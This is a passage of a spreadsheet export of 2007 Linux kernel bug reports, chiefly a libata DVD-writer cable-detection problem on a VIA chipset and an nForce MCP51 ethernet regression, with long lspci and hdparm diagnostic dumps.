    <t>Most recent kernel where this bug did not occur: I don't never worked right; first noticed when libata announced this fact Distribution: Gentoo Hardware Environment: Home-built machine, see lspci info below Software Environment:gentoo-sources-2.6.22-r5 (fails on vanilla-sources-rc6 as well) Problem Description: libata incorrectly limits CD-Writer to UDMA/33 (or at least gives the wrong reason why) Steps to reproduce: Just boot libata in incorrectly limiting (or incorrectly declaring) the DVD writer to UDMA/33. The cable is a 80-wire cable (I've tried multiple cables) I've already the patch that fixes the via_cable_detect function; but even replacing via_port_ops[_noirq].cable_detect with ata_cable_80wire() instead of via_cable_detect makes no difference. The problem occurs in include/linux/ata.h with the ata_drive_40wire() function, which is return 1 on that drive, which causes ata_dev_xfermask in drivers/ata/libata-core.c to print the message and limit the drive. Even if this some kind of hardware issue it should at least declare that the drive controller and drive don't agree. lscpi data: 00:00.0 Host bridge: VIA Technologies, Inc. VT8375 [KM266/KL266] Host Bridge 00:01.0 PCI bridge: VIA Technologies, Inc. VT8633 [Apollo Pro266 AGP] 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) 00:13.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) output of lspci -nxxxv -s 11.1: 00:11.1 0101: 1106:0571 (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: 1106:0571 Flags: bus master, medium devsel, latency 32, IRQ 255 [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [size=8] [virtual] Memory at 000003f0 (type 3, non-prefetchable) [size=1] [virtual] Memory at 00000170 (32-bit, non-prefetchable) [size=8] [virtual] Memory at 00000370 (type 3, non-prefetchable) [size=1] I/O ports at fc00 [size=16] Capabilities: [c0] Power Management version 2 00: 06 11 71 05 07 00 90 02 06 8a 01 01 00 20 00 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 01 fc 00 00 00 00 00 00 00 00 00 00 06 11 71 05 30: 00 00 00 00 c0 00 00 00 00 00 00 00 ff 01 00 00 40: 0b f2 09 35 18 1c c0 00 a8 20 a8 20 ff 00 20 20 50: 17 e6 17 e0 0c 00 00 00 a8 a8 a8 a8 00 00 00 00 60: 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 70: 02 01 00 00 00 00 00 00 02 01 00 00 00 00 00 00 80: 00 90 fd 1f 00 00 00 00 00 70 00 1f 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 06 00 71 05 06 11 71 05 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 00 Unfortunately attempt to get the ATA IDENTIFY PACKET DEVICE information fail with both hdparm AND sg_inq (but succeed with the hard disk) sg_inq --ata /dev/sr0 fails with "fetching ATA information failed on /dev/sr0" sg_vpd fails with "fetching VPD page failed" hdparm -I fails with "HDIO_DRIVE_CMD(identify) failed: Input/output error" However, boot an older kernel without libata (using the Gentoo LiveCD 7.0) does allow hdparm to work on it sort of. Each time hdparm is run in it (/dev/hdc in this case) it prints out: /dev/hdc: hdc: drive_cmd: status=0x51 { DriveReady SeekComplete Error } hdc: drive_cmd: error=0x04 { AbortedCommand } ide: failed opcode was: 0xec But it does give a result (from hdparm --Istdout): /dev/hdc: 85c0 0000 0000 0000 0000 0000 0000 0000 0000 0000 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 0000 0000 0000 4853 3045 2020 2020 4c49 5445 2d4f 4e20 4456 4452 5720 5348 4d2d 3136 3548 3653 2020 2020 2020 2020 2020 2020 2020 2020 0000 0000 0b00 4000 0000 0000 0006 0000 0000 0000 0000 0000 0000 0000 0000 079f 0007 0003 0078 0078 00f0 0078 0000 0000 0000 0000 0004 0009 0000 0000 0000 0000 0000 00f0 0000 0210 5000 4000 0210 1000 4000 101f 0000 0000 0000 0000 4101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faa5 Run though hdparm --Istdin, it gives ATAPI CD-ROM, with removable media Model Number: LITE-ON DVDRW SHM-165H6S Serial Number: Firmware Revision: HS0E Standards: Used: ATAPI for CD-ROMs, SFF-8020i, r2.5 Supported: CD-ROM ATAPI-2 Configuration: DRQ response: 50us. Packet size: 12 bytes Capabilities: LBA, IORDY(cannot be disabled) DMA: *sdma0 *sdma1 *sdma2 sdma3 sdma4 sdma7 mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 *udma4 (?) Cycle time: min=120ns recommended=120ns PIO: pio0 pio1 pio2 pio3 pio4 Cycle time: no flow control=240ns IORDY flow control=120ns Commands/features: Enabled Supported: * PACKET command feature set * DEVICE_RESET command * Mandatory FLUSH_CACHE HW reset results: CBLID- below Vih Device num = 0 (This is supposed to be a 16x drive, and I have 16x media, but it barely runs at 5x. Unfortunately even when the drive is in UDMA/66 mode its no faster ANYWAY. It could very well be this drive is just broken, but I've got another (Windows) machine I could that theory on)</t>
  </si>
  <si>
    <t>Loading i82875p_edac and edac_mc breaks agpgart</t>
  </si>
  <si>
    <t>EDAC</t>
  </si>
  <si>
    <t>2007-09-22 08:56 UTC</t>
  </si>
  <si>
    <t>Pacho Ramos</t>
  </si>
  <si>
    <t>2012-05-14 17:15 UTC</t>
  </si>
  <si>
    <t>doug thompson</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.6 Distribution: Mandriva Linux and Ubuntu Linux Problem Description: From: http://qa.mandriva.com/show_bug.cgi?id=32972 https://launchpad.net/ubuntu/+source/linux-source-2.6.20/+bug/78684 Direct rendering was broken due to a lack of /dev/agpgart (though both intel_agp and agpgart were loaded). lsmod indicated that i82875p_edac and edac_mc were both loaded. I knew that those two modules would break agp support on some intel motherboards. Blacklisting those modules and rebooting resulted in /dev/agpgart (and direct rendering) working. thanks a lot</t>
  </si>
  <si>
    <t>crashme fault</t>
  </si>
  <si>
    <t>2.6.23-rc6-git2</t>
  </si>
  <si>
    <t>2007-09-23 14:29 UTC</t>
  </si>
  <si>
    <t>2007-09-24 08:30 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/9/13/19 Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>console is messed up after resume from s2ram or switching to console from X</t>
  </si>
  <si>
    <t>2007-09-23 14:50 UTC</t>
  </si>
  <si>
    <t>2007-09-24 08:51 UTC</t>
  </si>
  <si>
    <t>Török Edwin</t>
  </si>
  <si>
    <t>usb/serial/pl2303: support for BenQ Siemens Mobile Phone S81</t>
  </si>
  <si>
    <t>2.6.22-12-generic (latest gutsy)</t>
  </si>
  <si>
    <t>2007-09-25 09:22 UTC</t>
  </si>
  <si>
    <t>Rolf Leggewie</t>
  </si>
  <si>
    <t>2009-06-02 08:55 UTC</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #8932 +++ Distribution: Ubuntu gutsy Hardware Environment: BenQ Siemens Mobile Phone S81 connected via USB-cord Problem Description: pl2303 already supports some Siemens Mobile Phones (SX1, X65, X75, ..</t>
  </si>
  <si>
    <t>Alias operator not fully implemented</t>
  </si>
  <si>
    <t>2007-09-25 10:11 UTC</t>
  </si>
  <si>
    <t>2008-06-13 21:15 UTC</t>
  </si>
  <si>
    <t>Alias operator does not work properly with objects that open a scope. These objects can have child objects and these objects cannot be seen via the alias. Objects include Scope, Device, Power, Processor, and Thermal. The alias is expected to perform exactly as the target.</t>
  </si>
  <si>
    <t>Bugzilla doesn't turn HTTP URLs in comments into clickable links</t>
  </si>
  <si>
    <t>2007-09-25 13:48 UTC</t>
  </si>
  <si>
    <t>2007-09-26 12:48 UTC</t>
  </si>
  <si>
    <t>According to the documentation at http://www.bugzilla.org/docs/2.22/html/hintsandtips.html Bugzilla is supposed to turn URLs in comments into clickable links, but currently it doesn't do that. Is there a way to make that work?</t>
  </si>
  <si>
    <t>Ethernet not functioning on Nvidia MCP51 since (at least 2.6.21.6); works perfectly with 2.6.18</t>
  </si>
  <si>
    <t>2007-09-26 03:12 UTC</t>
  </si>
  <si>
    <t>Philippe Bourcier</t>
  </si>
  <si>
    <t>2007-10-04 01:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: $ cat /proc/version Linux version 2.6.23-rc5-amd64 (Debian 2.6.23~rc5-1~experimental.1~snapshot.9529) (waldi@debian.org) (gcc version 4.1.3 20070718 (prerelease) (Debian 4.1.2-14+1)) #1 SMP Mon Sep 17 01:12:09 UTC 2007 $ sh /usr/src/linux-kbuild-2.6.22/scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux ile 2.6.23-rc5-amd64 #1 SMP Mon Sep 17 01:12:09 UTC 2007 x86_64 GNU/Linux Gnu C 4.2.1 Gnu make 3.81 binutils Binutils util-linux 2.13 mount 2.13 module-init-tools 3.3-pre11 e2fsprogs 1.40.2 Linux C Library 2.6.1 Dynamic linker (ldd) 2.6.1 Procps 3.2.7 Net-tools 1.60 Kbd 1.12 Sh-utils 5.97 udev 114 Modules Loaded xt_multiport binfmt_misc ipt_ULOG ac battery ipv6 cpufreq_stats cpufreq_conservative cpufreq_ondemand cpufreq_powersave cpufreq_userspace freq_table ipt_REJECT xt_tcpudp xt_state iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nfnetlink iptable_filter ip_tables x_tables fuse it87 hwmon_vid firewire_sbp2 loop snd_hda_intel snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd k8temp serio_raw button psmouse soundcore snd_page_alloc i2c_nforce2 i2c_core pcspkr evdev joydev tsdev ext3 jbd mbcache dm_mirror dm_snapshot dm_mod sg sr_mod cdrom sd_mod amd74xx usbhid hid firewire_ohci jmicron generic sata_nv ehci_hcd firewire_core crc_itu_t forcedeth ahci ohci_hcd ide_core ata_generic libata scsi_mod thermal processor fan Distribution: $ lsb_release -a LSB Version: core-2.0-noarch:core-3.0-noarch:core-3.1-noarch:core-2.0-amd64:core-3.0-amd64:core-3.1-amd64:desktop-3.1-noarch:desktop-3.1-amd64:graphics-2.0-noarch:graphics-3.0-noarch:graphics-3.1-noarch:graphics-2.0-amd64:graphics-3.0-amd64:graphics-3.1-amd64 Distributor ID: Debian Description: Debian GNU/Linux unstable (sid) Release: unstable Codename: sid Hardware Environment: $ sudo lspci -vvv 00:00.0 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [44] HyperTransport: Slave or Primary Interface Command: BaseUnitID=0 UnitCnt=15 MastHost- DefDir- DUL- Link Control 0: CFlE+ CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn- ExtCTL- 64b- Link Config 0: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Link Control 1: CFlE+ CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn+ ExtCTL- 64b- Link Config 1: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Revision ID: 1.03 Link Frequency 0: 1.0GHz Link Error 0: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 0: 200MHz+ 300MHz+ 400MHz+ 500MHz+ 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC+ LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- Link Frequency 1: 800MHz Link Error 1: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 1: 200MHz+ 300MHz+ 400MHz+ 500MHz+ 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Error Handling: PFlE+ OFlE+ PFE- OFE- EOCFE- RFE- CRCFE- SERRFE- CF- RE- PNFE- ONFE- EOCNFE- RNFE- CRCNFE- SERRNFE- Prefetchable memory behind bridge Upper: 00-00 Bus Number: 00 Capabilities: [e0] HyperTransport: MSI Mapping 00:00.2 RAM memory: nVidia Corporation C51 Memory Controller 1 (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.3 RAM memory: nVidia Corporation C51 Memory Controller 5 (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.4 RAM memory: nVidia Corporation C51 Memory Controller 4 (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:00.5 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [44] #00 [00fe] Capabilities: [fc] #00 [0000] 00:00.6 RAM memory: nVidia Corporation C51 Memory Controller 3 (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.7 RAM memory: nVidia Corporation C51 Memory Controller 2 (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:02.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: dfe00000-dfefffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Subsystem: nVidia Corporation Unknown device 0000 Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0300c Data: 4149 Capabilities: [60] HyperTransport: MSI Mapping Capabilities: [80] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;512ns, L1 &lt;4us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 512 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s L1, Port 2 Link: Latency L0s &lt;512ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x1 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug- Surpise- Slot: Number 0, PowerLimit 0.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Off, PwrInd On, Power- Root: Correctable- Non-Fatal- Fatal- PME- 00:03.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) (prog-if 00 [Normal decode]) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Subsystem: nVidia Corporation Unknown device 0000 Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0300c Data: 4151 Capabilities: [60] HyperTransport: MSI Mapping Capabilities: [80] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;512ns, L1 &lt;4us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 512 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s L1, Port 1 Link: Latency L0s &lt;512ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk- ExtSynch- Link: Speed 2.5Gb/s, Width x1 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug- Surpise- Slot: Number 0, PowerLimit 0.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Off, PwrInd On, Power- Root: Correctable- Non-Fatal- Fatal- PME- 00:04.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) (prog-if 00 [Normal decode]) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Subsystem: nVidia Corporation Unknown device 0000 Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0300c Data: 4159 Capabilities: [60] HyperTransport: MSI Mapping Capabilities: [80] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;512ns, L1 &lt;4us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 512 bytes Link: Supported Speed 2.5Gb/s, Width x16, ASPM L0s L1, Port 0 Link: Latency L0s &lt;512ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk- ExtSynch- Link: Speed 2.5Gb/s, Width x16 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug- Surpise- Slot: Number 0, PowerLimit 0.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Off, PwrInd On, Power- Root: Correctable- Non-Fatal- Fatal- PME- 00:05.0 VGA compatible controller: nVidia Corporation C51PV [GeForce 6150] (rev a2) (prog-if 00 [VGA]) Subsystem: ASUSTeK Computer Inc. Unknown device 8222 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 0 Region 0: Memory at de000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at c0000000 (64-bit, prefetchable) [size=256M] Region 3: Memory at dd000000 (64-bit, non-prefetchable) [size=16M] Expansion ROM at dfde0000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 00:09.0 RAM memory: nVidia Corporation MCP51 Host Bridge (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [44] HyperTransport: Slave or Primary Interface Command: BaseUnitID=9 UnitCnt=15 MastHost- DefDir- DUL- Link Control 0: CFlE+ CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn+ ExtCTL- 64b- Link Config 0: MLWI=8bit DwFcIn- MLWO=8bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Link Control 1: CFlE- CST- CFE- &lt;LkFail+ Init- EOC+ TXO+ &lt;CRCErr=0 IsocEn- LSEn- ExtCTL- 64b- Link Config 1: MLWI=8bit DwFcIn- MLWO=8bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Revision ID: 1.03 Link Frequency 0: 800MHz Link Error 0: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 0: 200MHz+ 300MHz+ 400MHz+ 500MHz+ 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC+ LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- Link Frequency 1: 200MHz Link Error 1: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 1: 200MHz- 300MHz- 400MHz- 500MHz- 600MHz- 800MHz- 1.0GHz- 1.2GHz- 1.4GHz- 1.6GHz- Vend- Error Handling: PFlE+ OFlE+ PFE- OFE- EOCFE- RFE- CRCFE- SERRFE- CF- RE- PNFE- ONFE- EOCNFE- RNFE- CRCNFE- SERRNFE- Prefetchable memory behind bridge Upper: 00-00 Bus Number: 00 Capabilities: [e0] HyperTransport: MSI Mapping 00:0a.0 ISA bridge: nVidia Corporation MCP51 LPC Bridge (rev a3) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:0a.1 SMBus: nVidia Corporation MCP51 SMBus (rev a3) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 10 Region 4: I/O ports at 0600 [size=64] Region 5: I/O ports at 0700 [size=64] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0b.0 USB Controller: nVidia Corporation MCP51 USB Controller (rev a3) (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 5 Region 0: Memory at dfdde000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0b.1 USB Controller: nVidia Corporation MCP51 USB Controller (rev a3) (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin B routed to IRQ 15 Region 0: Memory at dfddfc00 (32-bit, non-prefetchable) [size=256] Capabilities: [44] Debug port Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 00:0d.0 IDE interface: nVidia Corporation MCP51 IDE (rev a1) (prog-if 8a [Master SecP PriP]) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size=1] Region 4: I/O ports at ffa0 [size=16] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0e.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 